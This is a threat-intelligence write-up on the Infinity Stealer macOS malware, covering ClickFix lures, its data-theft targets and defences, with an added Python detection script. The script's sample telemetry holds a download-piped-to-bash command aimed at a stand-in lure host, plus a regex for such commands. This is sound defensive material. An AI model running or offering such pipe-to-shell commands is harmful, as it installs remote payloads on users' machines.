Infinity Stealer macOS Malware: Analyzing ClickFix Lures and Payloads
- [01] Immediate impact: macOS users face credential and cryptocurrency theft from a new Python-based info-stealer distributed via deceptive browser update prompts.
- [02] Affected systems: The malware targets macOS systems, specifically exfiltrating data from Chromium-based browsers, cryptocurrency wallets, and the system Keychain.
- [03] Remediation: Deploy advanced endpoint detection rules to block unauthorized Python execution and educate users against running scripts from untrusted browser pop-ups.
A newly identified phishing campaign is targeting macOS users with a sophisticated info-stealer dubbed Infinity Stealer. This malware, according to BleepingComputer, leverages the increasingly popular ClickFix technique to deceive users into executing malicious scripts under the guise of browser repairs or certificate updates.
Technical Analysis of Nuitka-compiled Python Malware Detection
Infinity Stealer is developed in Python and converted into a standalone Mach-O executable using Nuitka, an open-source compiler that translates Python code into C++ before compiling it. This method provides several advantages for threat actors, primarily in obfuscating the underlying source code and complicating the reverse engineering process. Security professionals who aim to detect Infinity Stealer macOS malware must look beyond traditional script-based detection, as the Nuitka-compiled binary behaves differently than a standard Python interpreter execution.
The malware’s execution chain typically begins when a user encounters a compromised or malicious website. These sites display fake error messages—often claiming a browser or security certificate has failed—and provide a set of instructions to ‘fix’ the issue. This often involves copying a PowerShell or Terminal command to the clipboard and executing it manually. In the case of macOS, this command downloads and executes the Infinity Stealer payload.
This specific TTP exploits user trust and bypasses many automated browser protections by shifting the execution burden to the victim. For defenders, detecting Nuitka-compiled Python malware requires monitoring for specific metadata within Mach-O files and observing suspicious child processes spawned from Terminal or other shell environments. The MITRE ATT&CK framework classifies this under User Execution (T1204), highlighting the social engineering component of the threat.
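As an added illustration of the process-chain monitoring described above (example code, not from the original report or any vendor tooling), the following Python sketch walks constructed process-start telemetry and flags two behaviours of the ClickFix chain: a shell descended from Terminal.app that pipes a download straight into an interpreter, and an unsigned binary launched from a temporary path by that same lineage. The event field names, paths and sample commands are assumptions made for this example.

```python
import re

# Constructed process-start telemetry; field names are assumed, not from any real EDR.
EVENTS = [
    {"pid": 500, "ppid": 1, "exe": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal", "cmd": "Terminal", "signed": True},
    {"pid": 501, "ppid": 500, "exe": "/bin/zsh", "cmd": "-zsh", "signed": True},
    {"pid": 502, "ppid": 501, "exe": "/bin/bash", "cmd": "bash -c 'curl -fsSL http://lure.invalid/fix | bash'", "signed": True},
    {"pid": 503, "ppid": 502, "exe": "/tmp/.update", "cmd": "/tmp/.update", "signed": False},
    # Benign: a plain file download from the same shell, nothing piped into an interpreter.
    {"pid": 600, "ppid": 501, "exe": "/usr/bin/curl", "cmd": "curl -O https://example.invalid/report.pdf", "signed": True},
]

TERMINAL = "Terminal.app/Contents/MacOS/Terminal"
SHELLS = ("/bin/sh", "/bin/bash", "/bin/zsh")
# A downloader whose output is piped directly into a shell or Python interpreter.
PIPE_TO_INTERP = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b|\|\s*python3?\b")
# Locations from which a freshly dropped, unsigned payload is commonly launched (assumed list).
TEMP_DIRS = ("/tmp/", "/private/tmp/", "/var/folders/", "/Users/Shared/")

def ancestors(pid, by_pid):
    """Yield the executable of each ancestor, nearest parent first, stopping at the root."""
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        pid = by_pid[pid]["ppid"]
        if pid in by_pid:
            yield by_pid[pid]["exe"]

def from_terminal(pid, by_pid):
    """True when Terminal.app is anywhere in the process's ancestry."""
    return any(exe.endswith(TERMINAL) for exe in ancestors(pid, by_pid))

def detect(events):
    """Return (pid, rule) alerts for ClickFix-style chains rooted in Terminal.app."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if not from_terminal(e["pid"], by_pid):
            continue
        if e["exe"] in SHELLS and PIPE_TO_INTERP.search(e["cmd"]):
            alerts.append((e["pid"], "download-piped-to-interpreter"))
        if not e.get("signed", True) and e["exe"].startswith(TEMP_DIRS):
            alerts.append((e["pid"], "unsigned-binary-from-temp-path"))
    return alerts

if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(f"ALERT pid={pid} rule={rule}")
```

The benign download (pid 600) is not flagged because it neither pipes into an interpreter nor executes an unsigned binary; in production the signed flag and parent lineage would come from the EDR's own process events.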
Data Exfiltration and C2 Communication
Once active, Infinity Stealer performs extensive reconnaissance of the host system. It utilizes the native system_profiler utility to gather hardware details, OS version, and processor information. Its primary objective, however, is the theft of sensitive data stored within applications. The malware targets various Chromium-based browsers, including Google Chrome, Brave, Microsoft Edge, and Opera, to exfiltrate:
- Login credentials and saved passwords.
- Browser cookies and session tokens.
- Credit card information stored in autofill settings.
Beyond browser data, Infinity Stealer specifically targets cryptocurrency wallets and decentralized application extensions. It also attempts to extract data from the macOS Keychain, Telegram session files, and Discord tokens. All harvested data is bundled and exfiltrated to a C2 server, which in this instance is managed via a Telegram bot API. This use of legitimate communication platforms for data exfiltration allows the traffic to blend in with normal network activity, potentially evading detection by standard network monitoring tools.
Defense and Mitigation Strategies
To effectively prevent ClickFix browser update social engineering attacks, organizations must adopt a multi-layered defense strategy. Because these attacks rely on human interaction, security awareness training is a vital component. Users should be educated on the risks of copying and pasting commands from websites into their system shell, regardless of how official the prompt appears.
From a technical perspective, the SOC should prioritize the implementation of EDR policies that restrict or alert on the execution of Python binaries in non-developer environments. Integrating IoC feeds into existing SIEM platforms will help identify known malicious domains and IP addresses associated with the ClickFix infrastructure. Furthermore, organizations should consider application whitelisting to ensure that only verified and signed binaries can execute on macOS endpoints, effectively neutralizing the threat posed by unsigned or ad-hoc compiled Nuitka binaries.